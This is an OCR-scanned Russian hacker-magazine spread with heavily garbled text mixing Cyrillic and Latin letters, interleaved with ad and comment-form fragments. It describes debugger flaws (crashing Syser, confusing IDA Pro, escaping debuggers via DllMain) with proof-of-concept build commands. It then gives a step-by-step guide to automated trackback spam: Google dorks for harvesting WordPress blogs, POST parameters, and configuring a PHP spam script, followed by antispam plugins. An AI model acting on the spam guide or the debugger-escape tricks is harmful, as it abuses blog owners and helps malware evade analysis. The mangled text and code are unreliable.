дискеты или сетевого диска... там, во- 
первых, скорость намного ниже, чем 
у винчестера, а во-вторых, сеть в лю- 
бой момент можетлечь, а диск могут 
вынуть. Разработчики ѴѴіпсІо\л/5учли 
такую возможность и решили пробле- 
му путем предварительной загрузки 



файла в оперативную память. За это 
отвечаетсовсем другой компонент 
загрузчика, игнорируемый Бузег’ом 
со всеми отсюда вытекающими. 



»ТагдеІ5| 



Все существующие в данный мо- 
мент версии Бузег’а. 



» Ехріоід 



Не требуется, достаточно попробо- 
вать загрузить любой исполняемый 
файл с сетевого диска, дискеты или 
СО/ОѴО, как результат все скажет 
сам за себя. 



»5оІи*іоп 



Всегда копируй файлы с сетевых дис- 
ков (сменных носителей) на жесткий 
диск перед их загрузкой в Бузег. 

5Ѵ5ЕК: 

В50Р НА 
ФАЙЛАХ ОП- 
РЕДЕЛЕННЫХТИПОВ 



>> Вгіе* 



Экспериментируя со штатным 
линкером от Місгозо^ на предмет 
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В5СЮ, вызываемый Бузег’ом при запуске «оптимизированного» файла 
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Реакция ЮА-Рго на попытку отладки файла с нулевым базовым адресом загрузки 




создания предельно компактных 
исполняемых файлов, я получил от 
одного из бета-тестеров баг-ре- 
порт. В нем говорилось, что на его 
машине при активном Бузег’е (ак- 
тивном — значит, просто запущен- 
ном, загрузки файла в отладчик не 
требуется] мои файлы уводятХР 
5Р2 в В5СЮ с указанием на драй- 
вер Зузег. зуз, принадлежащий, 
как и следует из названия, саб- 
жевому отладчику. Я попробовал 
воспроизвести данный эффект на 
своей горячо любимой ѴѴ2К и полу- 
чил тотже самый В5СЮ. Воттебе, 
бабушка, и оптимизация! Зато, 
какой шикарный способ борьбы 
с активным Зувег’ом! На ЗоШСЕ 
эффект не распространяется, од- 
нако ЗоПІСЕ на хакерских машинах 
встречается все реже и реже, осо- 
бенно на новых системах (которые 
он вообще не поддерживает). Раз- 
работчикам Зузег’а был отправлен 
очередной баг-репорт, но ответа 
не последовало (интересно, какую 
чудо-траву курят разработчики? 

— Прим. РогЬ). Когда они исправят 
дефект в отладчике — неизвест- 
но. Подробнее об этой ошибке 
можно прочитать на блоге: зоигіг. 
ѵѵогсірге55.сот/2008/05/09/5Ѵ5ег- 
саизез-Ьзоб . 



»ТагдеІ5:| 



Все существующие версии Зузег. 



» Ехріоід 



Готовую бинарную сборку файла, 
вызывающего В5СЮ (вместе с 
исходными текстами и командны- 
ми файлами для сборки в среде 
М3 ѴС] я выложил на свой сервер: 



ЬирѴ/пегиті.ога.ги/зоигіг/ТР-Ьиа. 
гір . Впрочем, сам исполняемый 
файл тутне причем (он можетбыть 
любым), главное — это опции линке- 
ра для его сборки, которые выглядят 
следующим образом: 

$1іпк.ехе %ШК%.оЬб 
/РІХЕБ /ЕЫТКУ : пегиші 
/ ЗБВЗУЗТЕМ : СОЫЗОБЕ 

/АЫСЫ : 16 /МЕКСЕ : . 
г<ааРа= . ЬехЦ /ЗТБВівбиЪ 
КЕКМЕЬЗ 2 . ЫВ 

Значения ключей компиляцииты 
можешь найти на нашем 0\Ю. 

В целях оптимизации я использо- 
вал «голый» МЗ-йОЗ оіб-ехе заго- 
ловокс отрезанным телом файла. В 
результате этих ухищрений размер 
файла (с полезным кодом, намного 
более функциональным чем «Ьеііо, 
ѵѵогіб») составил 624 байта, и это 
при том, что он написан на языке 
Си (пускай и не без ассемблер- 
ных вставок) и собран штатными 
средствами! Какой именно из этих 
параметров привел кпадению 
Зувег’а — янезнаю.а эксперимен- 
тировать, роняя свою систему в 
В5СЮ, — этим пусть разработчики 
Зувег’а занимаются. Кстати, если 
за грузить та кой файл в Зузег, а не 
просто запустить его при активном 
Зувег’е, то все будет нормально, и 
В5СЮ не появится. 



>>5оІиІіоп 



В ы гружать Зузег п е р ед за пус ко м 
потенциально небезопасных файлов 
(благо, Зузег, в отличие от ЗоШ СЕ, 
поддерживает возможность выгруз- 
ки из памяти «на лету»]. 



ША-РРО: 
ПРОСКОК ЕР 
НАФАЙЛАХ 
С ІМА6Е ВАЗЕ, РАВНОЙ 
НУЛЮ 



>> Вгіе* 



Как известно, ЮА-Рго с некоторых 
времен нетолько дизассемблер, 
но еще и отладчик. Отладчик не то, 
чтобы сильно мощный (намного 
слабее Ольги), но все-таки более 
удобный, чем постоянное пере- 
ключение между дизассемблером 
и внешним отладчиком, а потому 
активно используемый хакерами 
нарядус исследователями малвари. 
И все бы хорошо, но если «скормить» 
дизассемблеру файл с нулевым 
базовым адресом, он нормально 
загрузит его по этому адресу, но 
при попытке запуска отладчика 
мы получим ругательство: «ІШ 
Рго соиІдп'Ъ аиіотакісаііу 
беЬегтіпе іР ѣііе ргодгат 
зііоиЫ Ье геЬазеб іп іЪе 
баѣаЬазе Ьесаизе Іііе баІаЪазе 
Ногтаі із Ъоо оЫ апб боезп'І 
сопЬаіп епоидіі іпЛогтаІіоп. 
Сгеаіе а пем баѣаЬазе іі уои 
і шпѣ аиіотаѣеб геЪазіпд Іо 
ѵіогк ргорегіу. Ыоіісе уои сап 
аімауз тапиаііу геЬазе Іііе 
ргодгат Ъу изіпд Сйе Ебі ѣ , 
Зедтеп С з , ЯеЪазе ргодгат 
соттапб.» («ША-Рго не можетавто- 
матически определить: должна ли 
программа быть перемещена в базе, 
поскольку формат базы очень старый 
и не содержит достаточно информа- 
ции. Создайте новую базу, если вы 
хотите автоматизировать перемеще- 
ние. Примечание: вы можете пере- 



местить базу и самостоятельно: Ебй: 
-> Зедтепі -> РеЬазе ргодгат»). 
После чего нам предлагают нажать 
«ОК», чтобы согласиться. Но, чтобы 
мы не нажали — ОКили Езс, ЮА-Рго 
запускает процесс, полностью утра- 
чивая контроль и мерзко игнорируя 
все ранееустановленныеточки 
останова. Воттакой замечательный 
анализ малвари! К слову сказать, 
файл с нулевым базовым адресом 
загрузки при наличии в немтаблицы 
перемещаемых элементов совер- 
шеннозаконен и операционная 
система переместит его автомати- 
чески. А вот ЮА-Рго — нет. Я послал 
баг-рапорт Ильфаку, и тот сказал, 
что будет исправлять, так что следи 
за новостями: зоигіг.ѵѵогсіргезз. 
сот/2008/05/1 4/773-Ьиа-іп-ісІа- 
рго-іаіІз-Іо-сІеЬид-гего-Ьазе-ре . 



»ТагдеІ5| 



Все существующие на данный мо- 
мент версии ЮА-Рго (проверялось 
на 4.7 и 5.2). 



» Ехріош 



Исходный текст программы, де- 
монстрирующей уязвимость (вместе 
с ключами сборки], приведен ниже: 

ііпсіисіе <зЬсііо.Ь.> 

шаіп ( ) { 

ргіпрб ( "Ьеііо, Ѵ7<эг1сі! " ) ; 

} 

$с1 /с Ьеііо-могісі. с 
$1іпк Ье11о-ж>г1сІ. оЪз 
/РІХЕБ :Ш /ВАЗЕ: 0 



»5оІиііоп 



Перед запуском отладчика удосто- 
верься, что программа находится 
по «правильным» адресам. В 
противном случае перемести ее на 
новое место (например, по адресу 
400000Ъ] через Ебіі: -> Бедтепі -> 
РеЬазе ргодгат, или же с помо- 
щью утилиты тз ебіЬЪіп.ехе 
(в последнем случае потребуется 
перезагрузка файла в ЮА-Рго с по- 
терей всех предыдущих результатов 
анализа). 

РІЛ.І.- 

0І5СЮ5Е: 

и УНИВЕР- 
САЛЬНЫЙ СПОСОБ 
ВЫХОДА ИЗ-ПОД ОТ- 
ЛАДЧИКА 



>> Вгіе? 



В процессе реализации проекта 
по переносу 5оЫСЕ на Висту и 
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Прототип функции КіІІзегАрсОізраІсЬег, с которой начинаетжизньлюбой поток 




Мой блог 

Зегѵег 2008 (при финансовой поддержке фирмы К7) я исследовал ЗоЙІСЕ 
вместе с кучей других отладчиков и с удивлением обнаружил, что все 
они спроектированы неправильно. Отлаживаемая программа может 
вырваться из-под контроля еще до начала трассировки — непосредст- 
венно в процессе загрузки файла в отладчик. Чтобы выяснить, почему 
так происходит, нам необходимо разобраться, как вообще отладчики 
«стопорят» программу, а делаютони это приблизительно так: сначала 
процесс загружается в память, отладчик отслеживает этот момент и, счи- 
тывая из РЕ-заголовка точку входа в файл, устанавливает по этому адресу 
программную или (реже) ап па ратную точку останова. Затем возвращает 
бразды правления операционной системе, которая посредством функции 
КіѴзегАрсБізраЬсііег создает первичный поток. Прототип функции 
приведен на рисунке, откуда видно, что стартовый адрес потока переда- 
ется как аргумент по ЫТАРІ соглашению, то есть через пользовательский 
стек. После чего система начинает подгружать статически прилинкован- 
ные динамические библиотеки, вызывая функцию БІІМаіп (если, конеч- 



но, ОЬЬ имеетточку входа) и ОЕЬ. Если ВІІМаіп возвращает 
ноль, система сообщаетоб ошибке загрузки приложения 
и завершает процесс. В противном же случае (когда все 
динамические библиотеки рапортуют, что инициализация 
прошла успешно) управление передается первичному 
потоку процесса, где находится точка останова, установ- 
ленная отладчиком. При попытке ее выполнения процессор 
генерирует исключение типа Ъгеакроіпі ехсерѣіоп, 
отлавливаемое операционной системой и передающее 
отладчику бразды правления. 

Таким образом, вырисовывается не очень-то приятная для 
отладчиков и исследователей малвари картина: 

1. Функции БІІМаіп всех статически прилинкован- 
ных библиотек отрабатывают еще до начала «всплы- 
тия» отладчика, и в них может находиться все, 
что угодно ! В принципе , исполняемый файл может 
ограничиться процедурой-пустышкой, разместив 
зловредный код в одной из своих БЬЬ , и он будет 
выполнен еще до «всплытия» отладчика . 

2 . Функции БІІМаіп выполняются уже после уста- 
новки отладчиком точки останова на ЕпбгуРоіпб . 
Если это программная точка, представленная 
опкодом ССЬ., то динамическая библиотека может 
обнаружить, что процесс находится под отладкой 
и либо сделать что-то нехорошее, либо вызвать 
ѴігбиаІРгобесб , присвоить соответствующей стра- 
нице памяти атрибут на запись, снять точку останова, вос- 
становив оригинального содержимое первого байта (естес- 
твенно, для этого его нужно где-то хранить или вычислять 
эвристическим путем) . Тогда точки останова уже не будет, 
процессор не сгенерирует исключение , и отладчик не смо- 
жет перехватить управление . 

3 . Если отладчик установил аппаратную точку оста- 
нова, то из БІІМаіп можно изменить аргумент функции 
КіизегАрсБІ8рабсЬ.ег , хранящий стартовый адрес первич- 
ного потока. Тогда, по завершении инициализации всех 
динамических библиотек, поток начнет свое выполнение 
отнюдь не с точки входа, прописанной в РЕ- заголовке , а 
оттуда, откуда БЬЬ пожелает , вырываясь из-под контро- 
ля отладчика. Естественно, чтобы менять аргумент , его 
еще необходимо найти, что не так-то просто, поскольку, 
в зависимости от версии операционной системы и прочих 
обстоятельств, он меняет свое местоположение в широ- 
ких пределах. Поэтому приходится прибегать к различным 
эвристическим методикам, например, считывать из РЕ-за- 
головка оригинальную точку входа и искать в стеке двойное 
слово, совпадающее с ней. 

Конечно, теоретики от программирования скажут, мол, в чем проблема-то? 
Операционная система уведомляет отладчик о загрузке всех динамических 
библиотек еще до начала выполнения ОІІМаіп и ничего не стоит иссле- 
довать их на вшивость. Многие отладчики даже имеютспециальную опцию 
— останавливаться на ОІІМаіп. Воттолько ни у одного из них она поумол- 
чанию не включена, а анализироватьІ)1ІМаіл в отладчике — гиблое дело, 
особенно если она вызывается из стартового библиотечного кода. Но, даже 
отлаживая ВІІМаіп, мы можем не заметить (или не понять), как она меняет 
аргумент функци и КіизегАрсПізраЬсЪ.ег или снимаетточку останова, 
поскольку для этого необходимо знать, что именно у нас находится в памяти 
и зачем онотам находится. Сточки зрения не оченьопытного реверсера это 
выглядит вполне невинно. Ну, меняет что-то такое йЕЕ в стеке и завершает- 
ся, но ведь это не страшно, правда? Мы ведь все равно вернемся в отладчик 
при начале выполнение процесса, верно?Авоти нет! Уже не вернемсяІТак 
что проблема на самом деле очень серьезна. Подробнее ее планируется 
осветить на моем блоге ( зоигіг.ѵѵогсіргезз.сот ). 
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АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальнее предложение: 
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Сообщение о неудачной инициализации динамической библиотеки, 
ведущей кзавершению процесса 



ТЕЛЕФОН 



ИНТЕРНЕТ 

подтл Ю-^ЕКИЕ БЕСПЛАТНО 



» Тагдеі5| 



МБѴБ.ѴѴіпОЬд, ОИуБЬд, ІттйЬд, Бувег, ЗоШСЕ, ЮА-Рго и многие 
другие. 



* Псдключеиніі - в лпйои ме:тс 
М □ скпы и Москапскои ойл. 



|» Ехріоід 



Демонстрационный пример (вместе с полными исходными текстами, 
правда, без комментариев) выложен на ОрепРСЕ в мой репрозито- 
рий: ЬТТрз:// орепгсе.ога/герозііогіев/ивегз/пегиті/аиих-сгаскте. 
гір . Примерзанимаетвупакованном виде меньше 2х килобайт, сов- 
местим с Вистой/5егѵег2008 и не конфликтуете Бузе г’ ом (в смысле 
не «выбивает» из него В5СЮ, но ускользает из-под вышеперечис- 
ленных отладчиков). 



* Срок. іі с дк точений & Моек Не - дней, 

О иоссйііскйй обл, - РТ 1 4 до 30 диен, 

■ Ус Те но о к,* Лрнрчоіп чилочовскиГ о ТеЛеф*Мн*Тй номера 

* М коток в«*дьные телефонные номера 



»5оІи(іоп 



Отсутствует. Ну, не то, чтобы совсем, — но общих решений нет, и по- 
мимо ОІІМаіп существует много всего, исполняющегося до «всплы- 
тия» отладчика. Взять хотя бы те же ТІ_5-саІІЬаск‘и. А потому загрузка 
программы в отладчик — равносильна ее запуску, и потенциально 
опасные файлы можно использовать только на специальной (вирту- 
альной) машине, на которой нет ничего, что было бы жалко потерять. 
Кстати, в ОИу АбѵапсесІ — популярном ріид-іп’е для Ольги — есть 
опция «РІехіЫе Вгеакроіпіз», убирающая программную 
точку останова, что предотвращает обнаружение отладчика, но не в 
силах противостоять подмене стартового адреса первичного потока. 
Аналогичным образом дела обстояти с другим популярным ріид- 
іп’ом — РЬапЮт, имеющим опцию«Ветоѵе ЕР Вгеак», назначение 
которой говорит само за себя. 

Разумеется, это никакой не сгаскте (в обычном смысле), а настоя- 
щий ехріоіітипа ргооі-о^-сопсері, предназначенный для тестирова- 
ния отладчиков на «вшивость» и написанный так, чтобы предельно 
облегчитьего понимание, благодаря чему сломать его — плевое 
дело. Но если наворотить здесьхитрый код, то шансы на понимание 
резко снизятся, а шансы на «взлом» отладчика, соответственно, 
резко возрастут. Борьба с отладчиками на данном этапе не входила в 
мою задачу — этому посвящена отдельная колонка в журнале, а здесь 
мы говорим исключительноодырах(прорывсквозьотладчик— в 
первую очередь дефектпроектирования отладчика, то есть дыра, и 
только потом — антиотладочный приемі тг 



* 1Р- телефония 
* ВыДоЛюННЫ* линии Интернет 
* Корпоративные ч четны в соти [ѴРМІ 

■ Хостинг, услуги сІаСо-цонтра 



ХАКЕР 06 /114/ 08 



рм Трлеколт 

п.гпі іг! р-пшІІ Іпіа-й ггпЗ гл |4Фѣ| 1Е-П -Л !Л1 2 











взлом 



>> 



І_еаѵе а соттепі 





ІЧате 

МаіІ 

ѴѴеЬзііе 



ЕпГег Сосіе 

Мате 

МаіІ 

ѴѴеЬзііе 



І_еаѵе а соттепі 




Епіег Сосіе 

Мате 

МаіІ 

ѴѴеЬзііе 



соттепі 

] I И Епіег Сосіе 



І_еаѵе а соттепі 




Епіег Сосіе 

Мате 

МаіІ 

ѴѴеЬзіІе 



Мате 

СПАМОМ 
ПО ВЕБУ 



ЧЕРНЫЙ СЕТЕВОЙ МАРКЕТИНГ — ЗАЩИТА И НАПАДЕНИЕ 
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Епіег 

Мате 

МаіІ 

ѴѴеЬз 



І_еаѵе 

4 Ь 



На страницах журнала уже неоднократно описывалась вся подноготная 



3 СОПобычного мыльного спама. Но что ты знаешь о другом виде этой черной 



I аоію о лпттапі 



рекламы? О тех сообщениях, которые оставляют роботы на твоих форумах, 



ІЧ.ѴХ ХТѴТѵТѴ 






блогах и гостевых книгах. Хочешь знать, для чего они нужны и как от них -Піег Сосіе 



защититься? Тогда тебе может пригодиться моя статья. - 






Б ЦЕЛЬ ВЕБ-СПАМА 



Мате 

МаіІ 



Какты уже, наверное, знаешь, с помощью простого мыльного спама интер- 
нет-барыги продвигаютсвои товары в массы. Обычно это всевозможные 
увеличители мужского девайса и потенции, бытовая аудио- и видеотехни- 
ка, книги и диски. Да все, что угодно! Но насколько такой метод эффекти- 
вен? Если твоя мыльная база исчисляется миллионами адресов, то, естес- 
твенно, отдача будеточень и очень большая. Однако такие базы есть лишь 
у единиц, поэтому остальные интернет-торговцы занимаются веб-спамом 
— черным пиаром, который ориентирован, в первую очередь, на поисковые 
машины вроде гугла. Схема 5Е0 — БеагсЬ Епдіпе Оріітігаііоп — проста: 

1 . Серый или черный проект (обычно — магазин какой-либо партнерской 
программы), оптимизированный под поисковик и расположенный на 
бонусном хосте (в качестве бонуса — возраст домена, его индексация поис- 
ковыми системами). Причем хостможетбыть какфришным ( ЫодзроСсогп . 
для примера), так и взломанным пиаристым доменом. 

2. Размещение ссылок на свой проект, где только можно (это и есть веб-спам). 

3. Поднятие проекта в выдаче поисковика на высокие позиции по денеж- 
ным кейвордам. 



4. Получение отдачи (те же самые покупки увеличителя мужского девайса, 
ноуже напрямую ствоего проспамленного магазина). 

5. Бан твоего проекта в поисковике. 

6. Повторение описанного цикла. 

Учить тебя основам 5Е0 в задачу этой статьи не входит. Про БЕОты можешь 
почитать в декабрьском номере журнала в моем опусе «5Е0 в картинках». А 
сейчас нас интересуеттехническая сторона веб-спама. 

^ СОБИРАЕМ СПАМ-БАЗЫ 

Любая программа для ссылочного спама работает следующим образом: 

1 . Собирается некая база сайтов, где могут находиться формы для сабмита ссылки. 

2. В цикле перебирается каждая ссылка из базы, скачивается и просматри- 
вается на пример различных іпрій-форм. 

3. Если такие формы находятся, то к паге посылается Р05Т (или 6ЕТ) запрос 
со спам-текстом и спам-ссылками. 

4. Страница скачивается еще раз и проверяется на предметудачного 
сабмита. 
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5. Если сабмит прошел удачно, то ссылка заносится в доосіз-файл. 
Возникает резонный вопрос: где же взять спам-базу гест, форумов и 
блогов? Для примера возьмем блоги, созданные на базе платформы 
ѴѴогсІРгеББ (на этом примере ты точно также сможешь собрать базу и 
для любой известной гостевой книги или форума). Собирать базу мы 
будем, конечно же, у нашего любимого Гугла. Очень важно понимать, 
что такое парсинг. Это процесс сбора адресов ресурсов (сайтов), кото- 
рые мы будем использовать для спама. Парсить можно все, что душа 
пожелает — гостевые книги, форумы, блоги, вики, главное, чтобы можно 
было оставить сообщение со ссылкой на свой проект. 

Займемся непосредственно парсингом. Для начала определимся, ка- 
кой программой мы будем пользоваться. Для новичка вполне подойдет 
АНЭиЬтіиег, в нем есть встроенный парсер. Программа, как и боль- 
шинство других сп а мил о к- па рее ров, платная. Но если не покупать, то 
она выполняеттолько функции парсера, что нам, собственно, и нужно! 
Парсер, встроенный в АИБиЬтіиег, собирает все урлы с найденной 
страницы, отсеивая дубликаты доменов и ссылок. Скачать демо-версию 
АИБитЫНег можно на официальном сайте программы \л/еЫоаапа1л/2ег. 
Ьіг/гиз/сІоѵѵпІоасІ.ЬітІ [для описываемых в статье действий больше 
подходят2-я и 3-я версии программы, а не представленная на офици- 
альном сайте 5-я, так как автор не смог ее... эээ... купить). 

После установки программы необходимо создать новую базу данных 
и задать для нее имя, например, «Блогобаза». Далее находим бразер 
программы, заходим через него на аооаіе.сот и вводимтам свой запрос 
(лучше, чтобы в Гугле была проставлена опция «Выдавать по 1 00 ссылок 
на странице» — это крайнеускоритсбор). 

А сейчас позволю себе небольшое отступление. Какой запрос вво- 
дить в Гугл для сбора тех же самых ссылок на блоги вордпресс? Как 
правило, все инсталляции ѴѴогсІРгеББ имеют одни и те же одинаковые 
элементы оформления, навигации и текста в шаблонах блога. Вот не- 
сколько наиболее общих запросов, прокатывающих для поиска постов 
в блогах: 

іпкікіе: "Віод АгсЪіѵе" 
іпигі : " ?р= " 

Ьеаѵе а Керіу 

Уои сап Іеаѵе а гезропзе 

іпигі : " #гезропб" 

ТЪіз епкгу маз розкеб оп 

После ввода одного из этих запросов жми на «Базы Данных -) Импортиро- 
вать из ІЕ Добавить». Как видишь, добавилось 99 ссылок. Нажимай «ОК», 
а в браузере программы — «Назад». То же самое проделывай со второй 
страницей выдачи, потом стретьей ит.д. 

Тутя подскажутебе небольшойТір&Тгіск :). Какты понимаешь, вышеназ- 
ванные запросы охватывают далеко не весь спектр установленных в инете 
вордпрессов. Каксузить круг поиска? Очень просто, ведь Гугл предоставля- 
ет нам замечательный оператор зіке, которым можно ограничивать поиск 
какой-либо одной определенной доменной зоной, например: 



домены, поэтому не стоитбояться комбинировать любые запросы с любыми 
операторами Гугла — дубликатов в любом случае не будет. 

г СПАМИМ ПО БЛОГАМ 

Что ж, базу для спама мы собрали. Теперь встает вопрос, чем же, собст- 
венно, спамить?Ты, конечно, можешь купитьтотже АИБиЬтИіег или 
любую другую навороченную спамилку (или еще раз пересмотреть диски 
из подшивки ][акера). Я же опишу отличный метод спама по блогам, давно 
используемый нашим братом для продвижения своих проектов в рунете и 
буржунете. Этот волшебный метод называется «ІтаскЬаск-комментарии» 
(еслиты решишьспамить именнотаким методом, то, собирая спам-базу, 
учитывай специфику урлов стрекбеком). 

Что такое {гаскЬаск? Для достоверности обратимся к Википедии (смотри 
врезку внизу страницы). 

Ключевая для нас фраза — «технология уязвима для спамерских рассылок». 
Как, наверное, ты уже понял, в случае успешного выполнения трекбека 
ты получаешь коммент на проспамленном блоге со ссылкой в заголовке. 
Осталось автоматизировать процесс для экономии нашего драгоценного 
времени! 

^ ПОСЫЛАЕМ ТРЕК 

Чтобы послать трек на блогжертвы, тебе понадобится специальная 
ссылка, на которую он и будет отослан. Обычно линк скрывается в 
ссылке под словом «ІгаскЬаск» и выглядит примерно так (на заметку 
сборщикам спам -баз ): Лккр; / /\ кѵт. Ыод. сот/ѵтр-ЪгаскЪаск . 
рЬр?р-1, или та к:І 2 к кр ; / /ѵ7ѵт. Ыод. сот/Ыод/2008 / 04 /20 / 
розі/ѣга скЬа ск / . 

Чтобы наш трек опубликовался, его необходимо послать в целевой блог. 

Для этого составляем обычный Р05Т запрос, в теле которого должны при- 
сутствовать следующие параметры: 

кік1е=Купить слона&иг1=1іккр : //зІоп-зЪор . сош&Ыод_ 
пате=Слон онлайн&ехсегрк=Хороший пост! Но автору явно 
необходимо купить слона . 

Расскажу подробнее о параметрахтрекбека: 

• Шіе — заголовок комментария, который будет находиться в теге 
<з 1 гопд>< / зЬгопд>. Обычно используется для вставки кейворда. 

• игі — ссылка на наш рекламируемый проект. 

• Ыод_пате — анкор к ссылке. Туттоже можно и нужно вставитьтаргетный 
кейворд. 



ТгаскЪаск 

ТгаскЪаск — это механизм уведомления сайта А (на нем может 
находиться, например, некая «родительская» статья) о сущес- 
твовании некоторого другого сайта В (например, с «дочерней» 
статьей или некоторым комментарием). То есть, если автор 
дочерней статьи пишет о родительской статье, то он может 
уведомить ресурс А об этом, послав ТгаскЪаск пинг — НТТР 
РОЗТ запрос специального вида на специальный адрес на сайте 
А, часто обозначаемый, как ТгаскЪаск 1Ш1. В качестве ответной 
реакции ресурс В получает статусное (успешно/не успешно) 
ХМЪ-сообщение, и часто (но не обязательно) на сайте А появля- 
ется обратная ссылка на дочернюю статью В. Оба сайта А и В для 
успешного взаимодействия должны поддерживать ТгаскЪаск 
протокол, но в спецификации нет никаких требований к 
наличию каких-либо ссылок с «дочернего» ресурса на «роди- 
тельский» — это одно из главных отличий данной технологии от 
механизма Ріп§Ъаск. 

Механизм был изобретен в 2002 году компанией 5іх АрагГ 
(англ.) (фр.) и нашел широкое применение в блогерских «движках». 
Поскольку эта технология уязвима для спамерских рассылок, некото- 
рые блогеры ее отключают. 



зіке: .сот 
зіке: .пек 
зіке: . Ьі 2 
зіке: .огд 
зіке : .паше 
зіке: .ги 
зіке : . кг 
зіке : . ік 
зіке: .из 
зіке : . еби 
зіке: .доѵ 
зіке: .шіі 
зіке : . іпко 

В общем, можно перебрать абсолютно все типы доменов. 

Стоит заметить, что АІІБиЬтіиег добавляет в базу только уникальные 
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| ІСТЧЭИТЬ | 



Парсер АІІЗиЬтіиег’а 



• ехсегрі — сам коммент. Как правило, спамеры для пущей убедительности 
вставляют цитату из самого поста и хвалят его автора, дабы обойти всевоз- 
можные антиспам примочки. 

Далее, после отправки Р05Т-запроса, тебе придет воттакой ХМЕ-ответ: 

<?хш1 ѵегзіоп= " 1 . О " епсосІіпд= "иЫі-8 " ?> 

<гезропзе> 

<еггог>0</ еггог> 

</гезропзе> 

В данном примере «<еггог>0</еггог>» обозначает, что все прошло гладко и 
твой трекбек понравился блогу. 

В АВТОМАТИЗАЦИЯ ПРОЦЕССА 

Трекбек — это, конечно, хорошо. Но каксоотнести вышеизложенное ствоей 
свежесобранной спам-базой и как автоматизировать весь процесс? При- 
мернотакимже вопросом задавались наши братья-славяне, когда откры- 
вали сей топик — Шр:/Алллл/ѵ.ро2ѵдопоѵѵапіе.р[/іпсІех.рЬр?5бо\лТоріс=3330 
с обсуждением трекбек-спама (еспиты знаешь польский, то узнаешь много 
интересного о веб-спамеу поляков :)). Втопике находится сорецкрайне 
полезного скрипта на рЬр для трекбек-спама. Я расскажутебе, каксним 
работать. 

Для начала скачай рЬр-класс Зпоору ( зоигсеіогае.пеі/ргоіесіз/зпоорѵ/ 
или просто скопируй файл сіазз-зпоору.рбр из ./ѵѵр-іпсіисіез в де- 



фолтном дистрибутиве Вордпресса). Затем закинь его в одну папку с 
польским скриптом — надеюсь, ты уже скопировал его код из топика? 

— и открывай файл іЪ-ІізІ-1 . ѣхі, в котором ты и должен прописать 
ссылки твоей спам базы (линки должны быть вида Ы:1:р://Ыоа.сот/ро5І:/ 
ІгаскЬаск/ 1. 

Теперь открывай сам скрипт и измени в нем под себя следующие 
параметры: 

// БаЕа зиЬгпіЕЕесі Тгош ЕЬе Тогш оп ЕМз зсгірЕ 
//вышеописанный Ыод_паше 
$ЕЬ [ ' ЫодЫаше 1 ] = " Віод паше " ; 

//вышеописанный ЕіЕІе 
$ЕЬ[ ' ЫодЕпЕгуТіЕІе ' ] = "АпсЪог" ; 

//вышеописанный игі 

$ЕЬ [ ' ЫодЕпЕгуШЬ ' ] = "ЪРЕр : / / (Тотеп . сот" ; 

//вышеописанный ехсегрЕ 
$ЕЬ [ ' ЫодЕхсегрЕ ' ] = "Оріз"; 

Без малейшего зазрения совести ты можешь приступать к нелегкому делу 
спама путем запуска польского скрипта на своем хосте :) 

г АНТИСПАМ 

Настало время подойти к веб-спаму с другой стороны. Теперь мы будем 
защищаться. О традиционных и появившихся в последнее время методах 
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антиспама я расскажу на примере всетого же ѴѴогсІргевз'а.так 
какэти методы, по сути, являются общими для всех онлайн- 
приложений. 

Защита отспама в комментариях в МогсіРгезз (впрочем, как 
и все остальные модификации движка блога] основана на 
плагинах. Поэтому я перечислю плагины, описывающие раз- 
личные антиспам-методики. Имхо, ничего другого и лучшего 
еще не придумано. 

1. АкІБтеІ [ акізтеЕсот ]. 

Это анти спам-служба с внешним интерфейсом для плагина. 
Перед добавлением в базулюбой комментарий проходит 
аппрув на сервере акисмета. Плагин включен в ѴѴогбРгевБ, 
начиная с версии 2.0. Все, что нужно сделать (помимо актива- 
ции плагина), так это получить ѴѴогсІРгезБ АРІ кеу. Также этот 
плагин доступен для рбрВВ и других популярных движков. 

2. ОиІ 2 ( ѵѵогфгезз.ога/ехІепб/рІиаіпз/диЫ . 

Оригинальный плагин от компании Аиіотаіііс, которая и за- 
нимается разработкой Вордпресса. После активации плагина 
любой комментатор в твоем блоге должен ответить на неслож- 
ный вопрос, который ты сможешь задать сам в админке. 

3. Брат Кагта 2 ( ипкпоѵѵпаепіиз.сот/Ыоа/ѵѵогсІргезз/зрат- 
кагта ). 

Это антиспам плагин, который объединяет в себе разнообраз- 
ные антиспам-подмодули. В отличие от Акізтеі, Брат Кагта 
— не внешняя служба. Обработка спама происходит в самом 
ѴѴогсІРгезБ. А значит, твой блог не будет зависеть от какого- 
либо стороннего сервера, как, например, Акізтеі. 

4. Васі ВеЬаѵіоиг2 ( еггог.\люгбрге55.сот/2006/07/04/ЬасІ- 
ЬеЬаѵіог-2 ). 

Плагин, идентифицирующий спамбота по строке с юзераген- 
том, которая, как правило, составляется очень небрежно, в 
результате чего комментарий рекламного характера может 
бытьлегко отловлен. 

5. Воі СЬеск [ м\лл/ѵ.Ь[иееѵе.и5/ѵѵогбрге55/іпбех.рІір?р=5 ). 
Стандартная, известная всем и наиболее эффективная капча. 
Этот плагин требует от комментатора ввести случайно сгене- 
рированный текст, который отображен в искаженном виде на 
картинке. Многим пользователям не нравится вводить какие- 
то числа, буквы, чтобы разместить комментарий — следует 
это учитывать. Также важно учесть, что такого рода защита не 
спасет от ручного спама. 

Р.5. Советую прочитать интересную тему на умаксфоруме 
про дешифровку простеньких капч с помощью РНР: ѵѵѵѵѵѵ. 
итахІогит.сот/5ЬоѵѵіИгеасі.рбр?1=26042 (развив эту тему, ты 
сможешь озолотиться на написании спамботов). 



6. МаіЬ Апіі-Брат ( ЬіІр://5ѵѵ-аиібе.бе/\л/огфге55/таіЬ- 
соттепІ-Брат-ргоІесІіоп-рІиаіп ). 

Плагин отличает человека от робота с помощью простого 
математического вопроса, например, 2+2*2=... (кстати, ответ 
8, а не 6 :)). 

7. Е-таіІСоттепІ АиіЬогііаІіоп ( ЬіІрѴАллл/ѵѵ.Бкірру.пеі/ 
Ь[оа/2004/04/27/р[иаіп-соттепІ-аиІІ~іогІ2аІіоп 1. 

После установки плагина твой блог будет просить комментато- 
ра подтвердить свое мыло. 

Также хочу дать несколько полезных советов, которые, воз- 
можно, защитят тебя от спамботов твоих же конкурентов. Вот 
что тебе необходимо сделать: 

1. На странице с комментариями добавить ложное пустое 
скрытое поле с названием, близким кобычным названиям 
полей форм добавления коммента, вроде етаіі, игі, ЪехЪ и 
т.д. Эвристические спамилки будут пытаться заполнить имен- 
но это поле и, возможно, обойдут стороной настоящие. 

2. Это же дополнительное поле можно сделать в виде обычно- 
го Ыті-элемента <іприЬ ... />, но скрыть его с помощью 
